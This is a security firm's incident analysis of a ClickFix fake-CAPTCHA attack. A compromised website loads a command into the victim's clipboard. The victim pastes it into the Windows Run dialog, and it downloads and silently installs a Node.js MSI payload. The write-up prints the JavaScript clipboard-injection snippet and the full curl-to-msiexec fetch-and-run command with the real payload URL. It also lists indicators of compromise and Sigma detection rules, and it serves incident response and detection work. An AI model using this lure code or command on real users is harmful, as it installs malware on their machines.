Prepared by: Philip O'Dwyer, SOC Manager & Muhammad Uzair, Security Analyst
Published: 15 April 2026
A user-driven execution technique bypasses traditional controls using trusted Windows binaries
A companion article covers the business impact and security implications for organisational leaders: https://www.triskelelabs.com/blog/copy-paste-cyber-attack-clickfix-soc-detection
A recent incident investigated by Triskele Labs highlights a growing shift in adversary tradecraft, where user-driven execution replaces traditional exploitation techniques.
In this case, a ClickFix-style Fake CAPTCHA lure was used to socially engineer a user into executing a malicious command. Rather than deploying a conventional malware dropper, the attacker relied entirely on legitimate Windows binaries and trusted infrastructure, forming a living-off-the-land (LOTL) attack chain.
From initial interaction to payload execution, the entire sequence completed in under 10 seconds.
Fake CAPTCHA pages abuse clipboard to trigger execution
Browser history analysis confirmed the user was actively searching for defibrillators, during which they visited:
defibrillators[.]com[.]au
Upon visiting the site, the user was presented with a ClickFix-style Fake CAPTCHA prompt, initiating the attack chain.
This indicates the site was either:
-
Compromised (likely) and serving malicious JavaScript
-
Or part of a malvertising / traffic redirection chain
Following interaction with the CAPTCHA, the page executed clipboard injection logic:
navigator.clipboard.writeText(
'cmd /c "curl -L https://<redacted>/payload.msi -o %TEMP%\\n.msi && msiexec /i %TEMP%\\n.msi /qn /norestart"'
);
After clicking the CAPTCHA, the user was shown instructions to:
-
Press Win + R
-
Paste the clipboard contents (Ctrl + V)
-
Press Enter
This removes interpretation from the user and ensures high-probability execution.
Initial Access Vector: User Intent Abuse
This incident demonstrates a shift toward intent-based initial access, where adversaries exploit legitimate user activity rather than relying on phishing or vulnerability exploitation.
In this case:
-
The user performed a legitimate search (defibrillators)
-
A relevant website was visited
-
The site delivered a malicious interaction via Fake CAPTCHA
This removes traditional indicators such as:
-
Suspicious emails
-
Malicious attachments
-
Known exploit activity
Instead, the attack leverages:
Trust in context and user intent as the delivery mechanism
Figure 1: ClickFix page impersonating a CAPTCHA prompt, using the clipboard API to pre-load a malicious command

Figure 2: Fake verification error prompting the user to execute a pre-loaded command via the Windows Run dialog
Figure 3: Clipboard Injection Materialised: Command Executed via Run
Malicious command leverages built-in Windows tools
Once executed, the command initiated a chained sequence of legitimate tools:
cmd /c "curl -L https://storage.googleapis.com/nodedownload/Node_Min.msi -o %TEMP%\n.msi && msiexec /i %TEMP%\n.msi /qn /norestart"

Figure 4: Run Dialog Execution Artefact with Embedded Payload Delivery Command
Breakdown of the attack command
|
Component |
Purpose |
|
cmd /c |
Executes command and terminates |
|
curl -L |
Downloads payload, following redirects |
|
Cloud Storage URL |
Trusted infrastructure used to host payload |
|
-o %TEMP%\n.msi |
Writes payload to temp directory |
|
&& |
Chains execution |
|
msiexec /i |
Executes MSI installer |
|
/qn |
Silent execution |
|
/norestart |
Suppresses reboot |
The use of Google Cloud Storage reduces suspicion and bypasses reputation-based controls.
Process chain confirms living-off-the-land execution
Endpoint telemetry revealed a clear parent-child execution chain:
explorer.exe
└── cmd.exe
└── curl.exe
└── msiexec.exe
This sequence demonstrates classic LOLBAS abuse:
-
curl.exe used for payload delivery (T1105)
-
msiexec.exe used for execution (T1218.007)

Figure 5: User Click to Code Execution: Visualising the Attack Chain
Registry artefacts confirm user-driven execution
Analysis identified the following registry artefact:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Containing:
cmd /c "curl -L https://storage.googleapis.com/.../Node_Min.msi ..."
This confirms execution via the Windows Run dialog, aligning with Fake CAPTCHA instructions.________________________________________
Attack completes in seconds, detection takes minutes
|
Time |
Event |
|
T+0s |
User interacts with page |
|
T+5s |
Command executed |
|
T+8s |
Payload downloaded |
|
T+9s |
MSI execution begins |
|
T+~5 min |
Detection triggered |
|
T+44 min |
Host contained |
The execution chain completes in <10 seconds, requiring detection and response to operate in near real time.
Behavioural detection identifies malicious execution pattern
The activity was detected via:
MaliciousCopyPaste (MITRE T1204.004)
Detection triggered based on:
-
Suspicious process chain
-
Command-line payload retrieval
-
Silent MSI execution
-
Execution originating from explorer.exe
Detection was not based on:
-
File hashes
-
Known malware signatures
-
Static indicators
Node.js installer used as payload staging mechanism
The payload was delivered as:
Node_Min.msi
This technique is commonly used to:
- Deploy Node.js runtime environments
- Execute JavaScript-based payloads
- Stage follow-on malware
Observed in campaigns involving:
- Lumma Stealer
- AsyncRAT
- Node-based loaders
Trusted tools, malicious intent
Every component used in this attack is legitimate:
- explorer.exe
- cmd.exe
- curl.exe
- msiexec.exe
Individually benign, collectively malicious:
explorer.exe → cmd.exe → curl.exe → msiexec.exe
Malicious intent is defined by execution sequence, not tooling
Why traditional security controls struggle
This attack bypasses traditional controls because:
-
No exploit is used
-
No malicious binary is initially dropped
-
Payload is hosted on trusted infrastructure
-
Execution uses signed binaries
Detection based on:
-
Signatures
-
Reputation
-
Static analysis
is ineffective.
Indicators of Activity (IOAs) and Compromise (IOCs)
IOAs (Behavioural Indicators)
-
explorer.exe → cmd.exe → curl.exe → msiexec.exe
-
MSI execution from %TEMP%
-
Silent install flags (/qn /norestart)
-
Command-line driven payload retrieval
-
RunMRU registry artefact
Indicators of Compromise (IOCs)
Malicious / Suspicious Domains
defibrillators[.]com[.]au
sasndfsdfghjasd[.]run
Malicious IP address
188[.]114[.]97[.]3
Payload Hosting
storage.googleapis.com (abused for payload delivery)
Filename
Node_Min.msi
Command Pattern
cmd /c curl -L <url> -o %TEMP%\*.msi && msiexec /i %TEMP%\*.msi /qn
Detection strategy and engineering
High-confidence detection patterns
-
cmd → curl → msiexec chain
-
MSI execution from %TEMP%
-
Silent install flags
-
External CLI-based downloads
Sigma detection concepts
title: Suspicious Curl to MSI Execution Chain
logsource:
category: process_creation
detection:
selection:
ParentImage: '*\\cmd.exe'
Image: '*\\curl.exe'
condition: selection
---
title: Silent MSI Execution from Temp
detection:
selection:
Image: '*\\msiexec.exe'
CommandLine|contains:
- '/qn'
- '%TEMP%'
condition: selection
MDR response prevents compromise
-
MTTD: 5 minutes
-
MTTR: 44 minutes
-
Execution chain analysed
-
Malicious intent confirmed
-
Host actively contained
Containment: the control that mattered
Host isolation:
-
Stopped further execution
-
Blocked outbound communication
-
Prevented persistence
-
Eliminated lateral movement
Attack stopped mid-execution, pre-impact
Detection vs response
-
Detection identifies activity
-
MDR enforces control
-
Payload execution completes
-
Runtime deployed
-
Secondary malware executes
A shift toward user-driven attack vectors
ClickFix campaigns demonstrate:-
Exploitation of user behaviour
-
Use of legitimate tooling
-
Execution-based attack chains
Detection must shift from:
“Is this file malicious?”
to:
“Does this behaviour make sense?”
Final thoughts
This attack reached execution despite existing controls, reflecting the effectiveness of user-driven, LOTL-based techniques. However, it did not progress to compromise.
-
Preventative controls disrupted execution
-
Behavioural detection identified the activity
-
Response actions ensured containment
The attack was stopped before impact through a combination of layered controls and MDR-led response.